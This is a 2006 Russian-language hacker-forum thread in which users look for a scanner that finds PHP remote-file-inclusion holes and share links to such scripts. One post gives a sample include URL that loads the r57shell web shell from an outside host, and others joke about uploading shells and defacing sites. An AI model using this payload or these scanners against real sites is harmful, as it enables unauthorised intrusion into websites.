сканнер уязвимостей в пхп инклуде

Discussion in 'Болталка' started by BlackCats, 19 Aug 2006.

  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    у когонить есть такой?
     
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,028
    Reputations:
    1,228
    А теперь ещё раз по-русски и желательно конкретнее выражай свои мысли, а то нихера не понятно)
     
    _________________________
  3. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    437
    Reputations:
    90
    хз работаем ручками
     
  4. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    437
    Reputations:
    90
    +toxa+ он имеет ввиду сканер, который ищет php injection на сайте....
     
  5. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    +toxa+
    ну знаеш народ делает инклуды?
    типа:
    antichat.ru?page=http://rst.void.ru/download/r57shell.txt?
     
  6. bobob

    bobob Member

    Joined:
    2 Jun 2006
    Messages:
    111
    Likes Received:
    69
    Reputations:
    -15
    :D всё! взломали античат.... :D
     
  7. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,028
    Reputations:
    1,228
    2 \6/
    Use hands
     
    _________________________
  8. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    (с) Мда...
     
  9. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Есть такое причем скриптов море

    Допустим утилита jane-jane от cup.su - http://cup.su/releases/jane.txt

    Или подобное от n4n0bit http://n4n0bit.nm.ru/c0d3/nJin4.pl.txt
     
  10. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    нда... так ни 1 дельного ответа не получил....
     
  11. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Он имеет ввиду не сканер, а вбиваешь адрес сайта и он быстро сам заливает шелл, готовит кофе и дефэйсит от имени Усамы.
     
  12. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    Да нету такого...
     
  13. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    нет! я имею ввиду сканнер, чтоб не вручную каждый хост проверять, а вбил и он пишет - вот тут index.php?XEP=
    есть уязвимость в инклуде.
     
  14. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Чем мой ответ не устраивает?
     
  15. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    там скрипты.... а мне хотелось бы программу - скрипты - геморой.
     
  16. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    А XSpider 7 разве не чекает подобным образом?
     
  17. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    конечно чекает, он вообще все доступные параметры чекает на все, даже пост параметры... но ручками иногда лучше выходит, если например в гугле пробить сайт.
     
  18. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    +1 спасибо)